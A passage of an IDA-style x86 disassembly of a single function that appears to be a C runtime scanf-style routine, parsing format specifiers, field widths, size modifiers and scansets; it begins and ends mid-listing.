var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_42EF2B
mov edi, [ebp+arg_0]
jmp short loc_42E554
; ---------------------------------------------------------------------------
loc_42E54F: ; CODE XREF: sub_42E525+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_42E554: ; CODE XREF: sub_42E525+28�j
cmp dword_4535A4, 1
jle short loc_42E56C
movzx eax, al
push 8
push eax
call sub_42F05B
pop ecx
pop ecx
jmp short loc_42E57B
; ---------------------------------------------------------------------------
loc_42E56C: ; CODE XREF: sub_42E525+36�j
mov ecx, off_453398
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_42E57B: ; CODE XREF: sub_42E525+45�j
cmp eax, ebx
jz short loc_42E5B5
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_42EFB2
pop ecx
pop ecx
push eax
call sub_42EF9B
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_42C47C
add esp, 0Ch
loc_42E5A3: ; CODE XREF: sub_42E525+8E�j
test eax, eax
jz short loc_42E5B5
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_42C47C
pop ecx
jmp short loc_42E5A3
; ---------------------------------------------------------------------------
loc_42E5B5: ; CODE XREF: sub_42E525+58�j
; sub_42E525+80�j
cmp byte ptr [esi], 25h
jnz loc_42EE97
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_42E5EC: ; CODE XREF: sub_42E525+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp dword_4535A4, 1
jle short loc_42E609
movzx eax, bl
push 4
push eax
call sub_42F05B
pop ecx
pop ecx
jmp short loc_42E618
; ---------------------------------------------------------------------------
loc_42E609: ; CODE XREF: sub_42E525+D3�j
mov ecx, off_453398
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_42E618: ; CODE XREF: sub_42E525+E2�j
test eax, eax
jz short loc_42E62E
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_42E693
; ---------------------------------------------------------------------------
loc_42E62E: ; CODE XREF: sub_42E525+F5�j
cmp ebx, 4Eh
jg short loc_42E671
jz short loc_42E693
cmp ebx, 2Ah
jz short loc_42E66C
cmp ebx, 46h
jz short loc_42E693
cmp ebx, 49h
jz short loc_42E64E
cmp ebx, 4Ch
jnz short loc_42E680
inc [ebp+var_D]
jmp short loc_42E693
; ---------------------------------------------------------------------------
loc_42E64E: ; CODE XREF: sub_42E525+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_42E680
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_42E680
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_42E693
; ---------------------------------------------------------------------------
loc_42E66C: ; CODE XREF: sub_42E525+113�j
inc [ebp+var_E]
jmp short loc_42E693
; ---------------------------------------------------------------------------
loc_42E671: ; CODE XREF: sub_42E525+10C�j
cmp ebx, 68h
jz short loc_42E68D
cmp ebx, 6Ch
jz short loc_42E685
cmp ebx, 77h
jz short loc_42E688
loc_42E680: ; CODE XREF: sub_42E525+122�j
; sub_42E525+12D�j ...
inc [ebp+var_F]
jmp short loc_42E693
; ---------------------------------------------------------------------------
loc_42E685: ; CODE XREF: sub_42E525+154�j
inc [ebp+var_D]
loc_42E688: ; CODE XREF: sub_42E525+159�j
inc [ebp+var_5]
jmp short loc_42E693
; ---------------------------------------------------------------------------
loc_42E68D: ; CODE XREF: sub_42E525+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_42E693: ; CODE XREF: sub_42E525+107�j
; sub_42E525+10E�j ...
cmp [ebp+var_F], 0
jz loc_42E5EC
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_42E6B8
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_42E6B8: ; CODE XREF: sub_42E525+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_42E6D6
mov al, [esi]
cmp al, 53h
jz short loc_42E6D2
cmp al, 43h
jz short loc_42E6D2
or [ebp+var_5], 0FFh
jmp short loc_42E6D6
; ---------------------------------------------------------------------------
loc_42E6D2: ; CODE XREF: sub_42E525+1A1�j
; sub_42E525+1A5�j
mov [ebp+var_5], 1
loc_42E6D6: ; CODE XREF: sub_42E525+19B�j
; sub_42E525+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_42E70F
cmp esi, 63h
jz short loc_42E700
cmp esi, 7Bh
jz short loc_42E700
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_42EFB2
pop ecx
jmp short loc_42E70B
; ---------------------------------------------------------------------------
loc_42E700: ; CODE XREF: sub_42E525+1C5�j
; sub_42E525+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42EF81
loc_42E70B: ; CODE XREF: sub_42E525+1D9�j
pop ecx
mov [ebp+var_14], eax
loc_42E70F: ; CODE XREF: sub_42E525+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_42E71F
cmp [ebp+var_C], eax
jz loc_42EEFB
loc_42E71F: ; CODE XREF: sub_42E525+1EF�j
cmp esi, 6Fh
jg loc_42E986
jz loc_42EC38
cmp esi, 63h
jz loc_42E963
cmp esi, 64h
jz loc_42EC38
jle loc_42E9B0
cmp esi, 67h
jle short loc_42E783
cmp esi, 69h
jz short loc_42E76B
cmp esi, 6Eh
jnz loc_42E9B0
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_42EE66
jmp loc_42EE8C
; ---------------------------------------------------------------------------
loc_42E76B: ; CODE XREF: sub_42E525+229�j
push 64h
pop esi
loc_42E76E: ; CODE XREF: sub_42E525+480�j
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz loc_42E9F8
mov [ebp+var_17], 1
jmp loc_42E9FD
; ---------------------------------------------------------------------------
loc_42E783: ; CODE XREF: sub_42E525+224�j
mov ebx, [ebp+var_14]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_42E79F
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_42E7A4
; ---------------------------------------------------------------------------
loc_42E79F: ; CODE XREF: sub_42E525+26A�j
cmp ebx, 2Bh
jnz short loc_42E7BB
loc_42E7A4: ; CODE XREF: sub_42E525+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_42EF81
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_42E7BE
; ---------------------------------------------------------------------------
loc_42E7BB: ; CODE XREF: sub_42E525+27D�j
mov edi, [ebp+arg_0]
loc_42E7BE: ; CODE XREF: sub_42E525+294�j
cmp [ebp+var_20], 0
jz short loc_42E7CD
cmp [ebp+var_C], 15Dh
jle short loc_42E7D4
loc_42E7CD: ; CODE XREF: sub_42E525+29D�j
mov [ebp+var_C], 15Dh
loc_42E7D4: ; CODE XREF: sub_42E525+2A6�j
; sub_42E525+2F2�j
cmp dword_4535A4, 1
jle short loc_42E7E9
push 4
push ebx
call sub_42F05B
pop ecx
pop ecx
jmp short loc_42E7F4
; ---------------------------------------------------------------------------
loc_42E7E9: ; CODE XREF: sub_42E525+2B6�j
mov eax, off_453398
mov al, [eax+ebx*2]
and eax, 4
loc_42E7F4: ; CODE XREF: sub_42E525+2C2�j
test eax, eax
jz short loc_42E819
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_42E819
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_42EF81
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_42E7D4
; ---------------------------------------------------------------------------
loc_42E819: ; CODE XREF: sub_42E525+2D1�j
; sub_42E525+2DB�j
cmp byte_4535A8, bl
jnz short loc_42E887
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_42E887
inc [ebp+var_4]
push edi
call sub_42EF81
mov ebx, eax
mov al, byte_4535A8
mov [esi], al
pop ecx
mov [ebp+var_14], ebx
inc esi
loc_42E842: ; CODE XREF: sub_42E525+360�j
cmp dword_4535A4, 1
jle short loc_42E857
push 4
push ebx
call sub_42F05B
pop ecx
pop ecx
jmp short loc_42E862
; ---------------------------------------------------------------------------
loc_42E857: ; CODE XREF: sub_42E525+324�j
mov eax, off_453398
mov al, [eax+ebx*2]
and eax, 4
loc_42E862: ; CODE XREF: sub_42E525+330�j
test eax, eax
jz short loc_42E887
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_42E887
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_42EF81
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_42E842
; ---------------------------------------------------------------------------
loc_42E887: ; CODE XREF: sub_42E525+2FA�j
; sub_42E525+304�j ...
cmp [ebp+var_1C], 0
jz loc_42E91F
cmp ebx, 65h
jz short loc_42E89F
cmp ebx, 45h
jnz loc_42E91F
loc_42E89F: ; CODE XREF: sub_42E525+36F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_42E91F
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_42EF81
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov [ebp+var_14], ebx
jnz short loc_42E8C6
mov [esi], al
inc esi
jmp short loc_42E8CB
; ---------------------------------------------------------------------------
loc_42E8C6: ; CODE XREF: sub_42E525+39A�j
cmp ebx, 2Bh
jnz short loc_42E8E9
loc_42E8CB: ; CODE XREF: sub_42E525+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_42E8DA
and [ebp+var_C], eax
jmp short loc_42E8E9
; ---------------------------------------------------------------------------
loc_42E8DA: ; CODE XREF: sub_42E525+3AE�j
; sub_42E525+3F8�j
inc [ebp+var_4]
push edi
call sub_42EF81
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_42E8E9: ; CODE XREF: sub_42E525+3A4�j
; sub_42E525+3B3�j
cmp dword_4535A4, 1
jle short loc_42E8FE
push 4
push ebx
call sub_42F05B
pop ecx
pop ecx
jmp short loc_42E909
; ---------------------------------------------------------------------------
loc_42E8FE: ; CODE XREF: sub_42E525+3CB�j
mov eax, off_453398
mov al, [eax+ebx*2]
and eax, 4
loc_42E909: ; CODE XREF: sub_42E525+3D7�j
test eax, eax
jz short loc_42E91F
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_42E91F
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_42E8DA
; ---------------------------------------------------------------------------
loc_42E91F: ; CODE XREF: sub_42E525+366�j
; sub_42E525+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_42EF9B
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_42EF2B
cmp [ebp+var_E], 0
jnz loc_42EE8C
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call off_453804
add esp, 0Ch
jmp loc_42EE8C
; ---------------------------------------------------------------------------
loc_42E963: ; CODE XREF: sub_42E525+20C�j
cmp [ebp+var_20], eax
jnz short loc_42E972
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_42E972: ; CODE XREF: sub_42E525+441�j
cmp [ebp+var_5], 0
jle short loc_42E97C
mov [ebp+var_16], 1
loc_42E97C: ; CODE XREF: sub_42E525+451�j
mov edi, offset dword_45322C
jmp loc_42EA91
; ---------------------------------------------------------------------------
loc_42E986: ; CODE XREF: sub_42E525+1FD�j
mov eax, esi
sub eax, 70h
jz loc_42EC34
sub eax, 3
jz loc_42EA82
dec eax
dec eax
jz loc_42EC38
sub eax, 3
jz loc_42E76E
sub eax, 3
jz short loc_42E9D4
loc_42E9B0: ; CODE XREF: sub_42E525+21B�j
; sub_42E525+22E�j
movzx eax, byte ptr [ebx]
cmp eax, [ebp+var_14]
jnz loc_42EEFB
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_42EE8C
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_42EE8C
; ---------------------------------------------------------------------------
loc_42E9D4: ; CODE XREF: sub_42E525+489�j
cmp [ebp+var_5], 0
jle short loc_42E9DE
mov [ebp+var_16], 1
loc_42E9DE: ; CODE XREF: sub_42E525+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_42EA95
mov eax, edi
lea edi, [eax+1]
jmp loc_42EA91
; ---------------------------------------------------------------------------
loc_42E9F8: ; CODE XREF: sub_42E525+24F�j
cmp ebx, 2Bh
jnz short loc_42EA1F
loc_42E9FD: ; CODE XREF: sub_42E525+259�j
dec [ebp+var_C]
jnz short loc_42EA0E
cmp [ebp+var_20], 0
jz short loc_42EA0E
mov [ebp+var_F], 1
jmp short loc_42EA1F
; ---------------------------------------------------------------------------
loc_42EA0E: ; CODE XREF: sub_42E525+4DB�j
; sub_42E525+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42EF81
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_42EA1F: ; CODE XREF: sub_42E525+4D6�j
; sub_42E525+4E7�j
cmp ebx, 30h
jnz loc_42EC6D
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42EF81
mov ebx, eax
pop ecx
cmp bl, 78h
mov [ebp+var_14], ebx
jz short loc_42EA6D
cmp bl, 58h
jz short loc_42EA6D
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_42EA57
push 6Fh
loc_42EA51: ; CODE XREF: sub_42E525+55B�j
pop esi
jmp loc_42EC6D
; ---------------------------------------------------------------------------
loc_42EA57: ; CODE XREF: sub_42E525+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_42EF9B
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_42EC6A
; ---------------------------------------------------------------------------
loc_42EA6D: ; CODE XREF: sub_42E525+517�j
; sub_42E525+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42EF81
pop ecx
mov ebx, eax
mov [ebp+var_14], ebx
push 78h
jmp short loc_42EA51
; ---------------------------------------------------------------------------
loc_42EA82: ; CODE XREF: sub_42E525+46F�j
cmp [ebp+var_5], 0
jle short loc_42EA8C
mov [ebp+var_16], 1
loc_42EA8C: ; CODE XREF: sub_42E525+561�j
mov edi, offset dword_453224
loc_42EA91: ; CODE XREF: sub_42E525+45C�j
; sub_42E525+4CE�j
or [ebp+var_18], 0FFh
loc_42EA95: ; CODE XREF: sub_42E525+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_429690
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_42EAB9
cmp byte ptr [edi], 5Dh
jnz short loc_42EAB9
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_42EABC
; ---------------------------------------------------------------------------
loc_42EAB9: ; CODE XREF: sub_42E525+584�j
; sub_42E525+589�j
mov dl, [ebp+var_35]
loc_42EABC: ; CODE XREF: sub_42E525+592�j
; sub_42E525+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_42EB21
inc edi
cmp al, 2Dh
jnz short loc_42EB08
test dl, dl
jz short loc_42EB08
mov cl, [edi]
cmp cl, 5Dh
jz short loc_42EB08
inc edi
cmp dl, cl
jnb short loc_42EADB
mov al, cl
jmp short loc_42EADF
; ---------------------------------------------------------------------------
loc_42EADB: ; CODE XREF: sub_42E525+5B0�j
mov al, dl
mov dl, cl
loc_42EADF: ; CODE XREF: sub_42E525+5B4�j
cmp dl, al
ja short loc_42EB04
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_42EAEC: ; CODE XREF: sub_42E525+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_42EAEC
loc_42EB04: ; CODE XREF: sub_42E525+5BC�j
xor dl, dl
jmp short loc_42EABC
; ---------------------------------------------------------------------------
loc_42EB08: ; CODE XREF: sub_42E525+5A0�j
; sub_42E525+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_42EABC
; ---------------------------------------------------------------------------
loc_42EB21: ; CODE XREF: sub_42E525+59B�j
cmp byte ptr [edi], 0
jz loc_42EF2B
cmp [ebp+var_3C], 7Bh
jnz short loc_42EB33
mov [ebp+arg_4], edi
loc_42EB33: ; CODE XREF: sub_42E525+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push [ebp+var_14]
mov [ebp+var_30], esi
call sub_42EF9B
pop ecx
pop ecx
loc_42EB4A: ; CODE XREF: sub_42E525+6BC�j
; sub_42E525+6C4�j
cmp [ebp+var_20], 0
jz short loc_42EB5E
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_42EBFA
loc_42EB5E: ; CODE XREF: sub_42E525+629�j
inc [ebp+var_4]
push edi
call sub_42EF81
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jz short loc_42EBEE
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_42EBEE
cmp [ebp+var_E], 0
jnz short loc_42EBE6
cmp [ebp+var_16], 0
jz short loc_42EBDB
mov ecx, off_453398
mov [ebp+var_38], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_42EBBA
inc [ebp+var_4]
push edi
call sub_42EF81
pop ecx
mov [ebp+var_37], al
loc_42EBBA: ; CODE XREF: sub_42E525+686�j
push dword_4535A4
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3E]
push eax
call sub_433252
mov ax, [ebp+var_3E]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_42EBDE
; ---------------------------------------------------------------------------
loc_42EBDB: ; CODE XREF: sub_42E525+673�j
mov [esi], al
inc esi
loc_42EBDE: ; CODE XREF: sub_42E525+6B4�j
mov [ebp+var_2C], esi
jmp loc_42EB4A
; ---------------------------------------------------------------------------
loc_42EBE6: ; CODE XREF: sub_42E525+66D�j
inc [ebp+var_30]
jmp loc_42EB4A
; ---------------------------------------------------------------------------
loc_42EBEE: ; CODE XREF: sub_42E525+649�j
; sub_42E525+667�j
dec [ebp+var_4]
push edi
push eax
call sub_42EF9B
pop ecx
pop ecx
loc_42EBFA: ; CODE XREF: sub_42E525+633�j
cmp [ebp+var_30], esi
jz loc_42EF2B
cmp [ebp+var_E], 0
jnz loc_42EE8C
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_42EE8C
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_42EC2C
and word ptr [eax], 0
jmp loc_42EE8C
; ---------------------------------------------------------------------------
loc_42EC2C: ; CODE XREF: sub_42E525+6FC�j
and byte ptr [eax], 0
jmp loc_42EE8C
; ---------------------------------------------------------------------------
loc_42EC34: ; CODE XREF: sub_42E525+466�j
mov [ebp+var_D], 1
loc_42EC38: ; CODE XREF: sub_42E525+203�j
; sub_42E525+215�j ...
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz short loc_42EC46
mov [ebp+var_17], 1
jmp short loc_42EC4B
; ---------------------------------------------------------------------------
loc_42EC46: ; CODE XREF: sub_42E525+719�j
cmp ebx, 2Bh
jnz short loc_42EC6D
loc_42EC4B: ; CODE XREF: sub_42E525+71F�j
dec [ebp+var_C]
jnz short loc_42EC5C
cmp [ebp+var_20], 0
jz short loc_42EC5C
mov [ebp+var_F], 1
jmp short loc_42EC6D
; ---------------------------------------------------------------------------
loc_42EC5C: ; CODE XREF: sub_42E525+729�j
; sub_42E525+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42EF81
pop ecx
mov ebx, eax
loc_42EC6A: ; CODE XREF: sub_42E525+543�j
mov [ebp+var_14], ebx
loc_42EC6D: ; CODE XREF: sub_42E525+4FD�j
; sub_42E525+52D�j ...
cmp [ebp+var_30], 0
jz loc_42ED86
cmp [ebp+var_F], 0
jnz loc_42ED64
loc_42EC81: ; CODE XREF: sub_42E525+82C�j
cmp esi, 78h
jnz short loc_42ECD5
cmp dword_4535A4, 1
jle short loc_42EC9E
push 80h
push ebx
call sub_42F05B
pop ecx
pop ecx
jmp short loc_42ECAB
; ---------------------------------------------------------------------------
loc_42EC9E: ; CODE XREF: sub_42E525+768�j
mov eax, off_453398
mov al, [eax+ebx*2]
and eax, 80h
loc_42ECAB: ; CODE XREF: sub_42E525+777�j
test eax, eax
jz loc_42ED56
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_433380
push ebx
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_42EF4A
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_42ED28
; ---------------------------------------------------------------------------
loc_42ECD5: ; CODE XREF: sub_42E525+75F�j
cmp dword_4535A4, 1
jle short loc_42ECEA
push 4
push ebx
call sub_42F05B
pop ecx
pop ecx
jmp short loc_42ECF5
; ---------------------------------------------------------------------------
loc_42ECEA: ; CODE XREF: sub_42E525+7B7�j
mov eax, off_453398
mov al, [eax+ebx*2]
and eax, 4
loc_42ECF5: ; CODE XREF: sub_42E525+7C3�j
test eax, eax
jz short loc_42ED56
cmp esi, 6Fh
jnz short loc_42ED13
cmp ebx, 38h
jge short loc_42ED56
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_433380
jmp short loc_42ED22
; ---------------------------------------------------------------------------
loc_42ED13: ; CODE XREF: sub_42E525+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_42C420
loc_42ED22: ; CODE XREF: sub_42E525+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_42ED28: ; CODE XREF: sub_42E525+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_42ED40
dec [ebp+var_C]
jz short loc_42ED64
loc_42ED40: ; CODE XREF: sub_42E525+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42EF81
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_42EC81
; ---------------------------------------------------------------------------
loc_42ED56: ; CODE XREF: sub_42E525+788�j
; sub_42E525+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_42EF9B
pop ecx
pop ecx
loc_42ED64: ; CODE XREF: sub_42E525+756�j
; sub_42E525+819�j
cmp [ebp+var_17], 0
jz loc_42EE4A
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_42EE4A
; ---------------------------------------------------------------------------
loc_42ED86: ; CODE XREF: sub_42E525+74C�j
cmp [ebp+var_F], 0
jnz loc_42EE42
loc_42ED90: ; CODE XREF: sub_42E525+90A�j
cmp esi, 78h
jz short loc_42EDD4
cmp esi, 70h
jz short loc_42EDD4
cmp dword_4535A4, 1
jle short loc_42EDAF
push 4
push ebx
call sub_42F05B
pop ecx
pop ecx
jmp short loc_42EDBA
; ---------------------------------------------------------------------------
loc_42EDAF: ; CODE XREF: sub_42E525+87C�j
mov eax, off_453398
mov al, [eax+ebx*2]
and eax, 4
loc_42EDBA: ; CODE XREF: sub_42E525+888�j
test eax, eax
jz short loc_42EE34
cmp esi, 6Fh
jnz short loc_42EDCD
cmp ebx, 38h
jge short loc_42EE34
shl edi, 3
jmp short loc_42EE0C
; ---------------------------------------------------------------------------
loc_42EDCD: ; CODE XREF: sub_42E525+89C�j
lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_42EE0C
; ---------------------------------------------------------------------------
loc_42EDD4: ; CODE XREF: sub_42E525+86E�j
; sub_42E525+873�j
cmp dword_4535A4, 1
jle short loc_42EDEC
push 80h
push ebx
call sub_42F05B
pop ecx
pop ecx
jmp short loc_42EDF9
; ---------------------------------------------------------------------------
loc_42EDEC: ; CODE XREF: sub_42E525+8B6�j
mov eax, off_453398
mov al, [eax+ebx*2]
and eax, 80h
loc_42EDF9: ; CODE XREF: sub_42E525+8C5�j
test eax, eax
jz short loc_42EE34
push ebx
shl edi, 4
call sub_42EF4A
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_42EE0C: ; CODE XREF: sub_42E525+8A6�j
; sub_42E525+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_42EE1E
dec [ebp+var_C]
jz short loc_42EE42
loc_42EE1E: ; CODE XREF: sub_42E525+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42EF81
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_42ED90
; ---------------------------------------------------------------------------
loc_42EE34: ; CODE XREF: sub_42E525+897�j
; sub_42E525+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_42EF9B
pop ecx
pop ecx
loc_42EE42: ; CODE XREF: sub_42E525+865�j
; sub_42E525+8F7�j
cmp [ebp+var_17], 0
jz short loc_42EE4A
neg edi
loc_42EE4A: ; CODE XREF: sub_42E525+843�j
; sub_42E525+85C�j ...
cmp esi, 46h
jnz short loc_42EE53
and [ebp+var_1C], 0
loc_42EE53: ; CODE XREF: sub_42E525+928�j
cmp [ebp+var_1C], 0
jz loc_42EF2B
cmp [ebp+var_E], 0
jnz short loc_42EE8C
inc [ebp+var_34]
loc_42EE66: ; CODE XREF: sub_42E525+23B�j
cmp [ebp+var_30], 0
jz short loc_42EE7C
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_42EE8C
; ---------------------------------------------------------------------------
loc_42EE7C: ; CODE XREF: sub_42E525+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_42EE89
mov [eax], edi
jmp short loc_42EE8C
; ---------------------------------------------------------------------------
loc_42EE89: ; CODE XREF: sub_42E525+95E�j
mov [eax], di
loc_42EE8C: ; CODE XREF: sub_42E525+241�j
; sub_42E525+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_42EED9
; ---------------------------------------------------------------------------
loc_42EE97: ; CODE XREF: sub_42E525+93�j
inc [ebp+var_4]
push edi
call sub_42EF81
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov [ebp+var_14], ebx
mov [ebp+arg_4], esi
jnz short loc_42EF06
mov ecx, off_453398
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_42EED9
inc [ebp+var_4]
push edi
call sub_42EF81
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_42EF14
dec [ebp+var_4]
loc_42EED9: ; CODE XREF: sub_42E525+970�j
; sub_42E525+99A�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_42EEEF
cmp byte ptr [esi], 25h
jnz short loc_42EF31
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_42EF31
mov esi, eax
loc_42EEEF: ; CODE XREF: sub_42E525+9B8�j
mov al, [esi]
test al, al
jnz loc_42E54F
jmp short loc_42EF2B
; ---------------------------------------------------------------------------
loc_42EEFB: ; CODE XREF: sub_42E525+1F4�j
; sub_42E525+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push [ebp+var_14]
jmp short loc_42EF0B
; ---------------------------------------------------------------------------
loc_42EF06: ; CODE XREF: sub_42E525+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_42EF0B: ; CODE XREF: sub_42E525+9DF�j
call sub_42EF9B
pop ecx
pop ecx
jmp short loc_42EF2B
; ---------------------------------------------------------------------------
loc_42EF14: ; CODE XREF: sub_42E525+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_42EF9B
dec [ebp+var_4]
push edi
push ebx
call sub_42EF9B
add esp, 10h
loc_42EF2B: ; CODE XREF: sub_42E525+1F�j
; sub_42E525+40A�j ...
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_42EF42
loc_42EF31: ; CODE XREF: sub_42E525+9BD�j
; sub_42E525+9C6�j
mov eax, [ebp+var_34]
